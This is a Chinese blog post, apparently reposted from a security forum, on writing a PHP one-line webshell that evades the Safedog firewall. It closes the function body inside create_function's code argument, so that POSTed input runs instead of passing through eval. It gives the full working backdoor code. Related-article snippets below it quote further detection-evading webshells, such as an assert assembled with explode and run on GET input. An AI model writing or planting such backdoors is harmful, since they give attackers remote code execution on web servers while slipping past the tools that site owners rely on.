php 过狗一句话木马的编写,过狗一句话编写之代码执行漏洞函数代替eval

最新推荐文章于 2024-08-06 22:50:12 发布
最新推荐文章于 2024-08-06 22:50:12 发布
阅读量902 收藏
点赞数 1
文章标签: php 过狗一句话木马的编写

1.说明

tips : 补发一个之前写的过狗一句话,当时有发在博客和t00ls,由于博客重建了,就从t00ls copy过来吧。

2.起因及过狗原理

今天下午看坛友发了一个求助贴,让帮忙分析一句话木马呢!

帖子二楼的大牛分析的很到位,那个一句话木马用了函数回调的方法,传递一个存在代码执行漏洞的函数preg_replace来代替eval执行代码

然后我就想着,安全狗查杀一句话的时候,通常检测eval 和 $_POST[x]有没有同时出现 ,正常的POST数据不拦截,小弟的认识 说的不对的地方还望大牛指正。

然后我们将POST来的数据放到存在代码执行漏洞的函数中,这样,POST来的数据就被执行了。

3.过狗SHELL编写

因此就想着试一试~选择的函数是create_function函数,这个函数曾在wordpress最近的代码执行漏洞中是罪魁祸首,我刚好复现过wordpress那个代码执行漏洞,对create_function比较熟悉(原帖地址:https://www.t00ls.net/thread-36509-1-1.html)

create_function函数接收两个参数$args 和 $code 然后组成新函数function_lambda_func($args){$code;} 并eval(function_lambda_func($args){$code;}),那么我们只要构造$code来闭合}然后将自己的代码放到函数体外面就可以执行了。

构造$code

1$code = "n;}$_POST[x];/*";

解释一下构造的$code:

双引号中$_POST[x]被执行(这里以提交x=phpinfo();为例)

1

2

3

4

5

6

7;来结束语句

}来结束函数体

phpinfo();;就在函数体外面被eval执行了

/*注释多余的代码

最终代码:

1eval(function_lambda_func($args){n;}phpinfo();;/*})

那么phpinfo()就被执行了.

如图:

0d575bcdb1d16159ac044108649eb47e.png

过狗测试:

567947dd27d24e830399a1f2ba9c02cf.png

4.最终代码

最终代码:

1

2

3

4

5<?php

$args = "tony";

$code = "n;}$_POST[x];/*";

echo create_function('$args',$code);

?>

这只萝北不能吃
关注
PHP WebShell 免杀
悦分享
08-01 5977
一般的,利用能够执行系统命令、加载代码函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
一句话木马过狗 php,ASP/PHP一句话木马过安全狗等杀软
weixin_28933797的博客
03-09 1220
站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。看多了之后 自然可以干掉木马……PHP一句话木马1、$hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$h...
过狗一句话 -Bugku
j7ur8
06-21 1121
搜索到的几种解法:    1. s=print_r(scandir('./')) 然后读取flag.txt    2. s=print_r(glob("*.*")) 然后读取show_source(flag.txt)    3. 使用flag_get_contents(flag.txt)读取文件    eg: 还有system('ls')的读取方法但是这里应该没有权限....
WebShell及一句话木马
最新发布
qq_67812668的博客
08-06 909
1.一句话木马的原理将一句话木马插入到asp文件中(包括asa.cdx.cer文件),该语句将会作为触发,接收入侵者通过客户端提交的数据,执行并完成相应的入侵操作。客户端则用来向服务端提交控制数据,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件。 2.通常WebShell客户端怎么绕过WAF1).绕过前台脚本检测扩展名上传Webshell当用户在客户端上传文件的时候,客户端与服务器没有进行任何的信息交互,判断上传文件的类型是前台脚本文件来判断。
php替代eval_phpeval函数的替代方法是什么?
weixin_34329524的博客
03-09 1092
我最近回答了this question.my answer的最后一部分完美地回答了这个问题,对于未来的读者来说比这里提供的答案更有用.这就是我回答自己问题的原因.PHP具有在大多数情况下可以避免使用eval的功能:> PHP是非常动态的语言.它有能力使用strings执行以下操作:>定义和/或获取变量(从PHP 4.3支持).例如:$variableName = 'MyVariable...
过狗一句话
小白的劝退之路
05-25 253
exlpde()分割a#s#s#e#r#t为assert,使用assert()函数的解析传进来的s串,assert有代码执行漏洞。 ?s=print_r(scandir('./')) 扫描当前目录,并按数组输出。
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1785
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞
热门推荐
时光隧道
03-28 5万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行eval() 和 exec() 函数
文件包含及代码执行及命令执行
j1044957016的博客
06-01 2568
文件包含,代码执行,命令执行常见的函数,以及如何绕过过滤
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
最新过安全狗一句话
10-14
最新过安全狗一句话
2015年最新的过狗一句话大马
12-26
2015年最新的过狗一句话大马
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
bugku:过狗一句话
wssmiss的博客
04-16 348
题目 php代码 explode(a,b,c):把字符串打散为数组,a为分隔符且不为空,b为待打散的字符,c规定所返回的数组元素的数目 0代表返回博阿寒一个元素的数组,大于0返回包含最多c个元素的数组。小于0,返回包含除最后的limit个元素意外的所有元素的数组 代码poc_1是一个数组有a,s,s,e,r,t五个元素 poc_2是assert函数 对传入的s进行操作 注:函数assert是检...
送给大家一个过狗一句话
qq_48511129的博客
01-26 413
送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; KaTeX parse error: Expected 'EOF', got '#' at position 16: poc_1=explode("#̲",poc); poc2=poc_2=poc2​=poc_1[0].poc1[1].poc_1[1].poc1​[1].poc_1[2].poc1[3].poc_1[3].poc1​[3].poc_1[4].$poc_1[5]; poc2(poc_2(poc2​(_GET[‘s’]) 分析代码
过狗一句话原理与利用
金色%夕阳的博客
05-03 1914
过狗一句话原理与利用 在之前的文件上传漏洞中就有介绍过木马文件,通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程中,可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤,从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护,比如安全狗。因此,学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习中我们称之为过狗一句话,该名称源于绕过安全狗的检测机制成功过上传一句话木马文件。 在学习过狗一句话之前,需要先学习一句话木马
一句话木马 php 过狗,如何自己写aspx过狗D盾一句话木马
weixin_39524882的博客
03-18 324
hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx引用i春秋作家团大佬一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞的web页面。目录:0×01:我没有aspx代码编写基础,我该从哪入手?0×02:正式开始:从过狗菜刀配置文件里寻找思路0×03:再写一个:分析各种拦截机制,一一绕...
【bugku_writeup】web22 过狗一句话
kkza的博客
12-31 212
根据提示,这是一个一句话木马 构造payload 用蚁剑操作一下,发现没有用,会报错,这个时候考虑手动爆破 先了解几个函数 print_r() 把数组的键和值均打印出来 scandir() 扫描目录下的目录和文件,并返回数组 __FILE__ :当前目录 得到当前路径 直接访问txt文件 get it! ...
Webshell一句话攻击技巧:PHP、ASP、JSP常见实现与防范
本文主要讨论了在Web开发中,如何利用不同服务器端脚本语言(如PHP、JSP、ASP等)实现一句话攻击(也称为“一句话木马”或“过狗”)来获取Webshell权限,以便通过像“菜刀”这样的工具进行远程控制。以下是关于这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值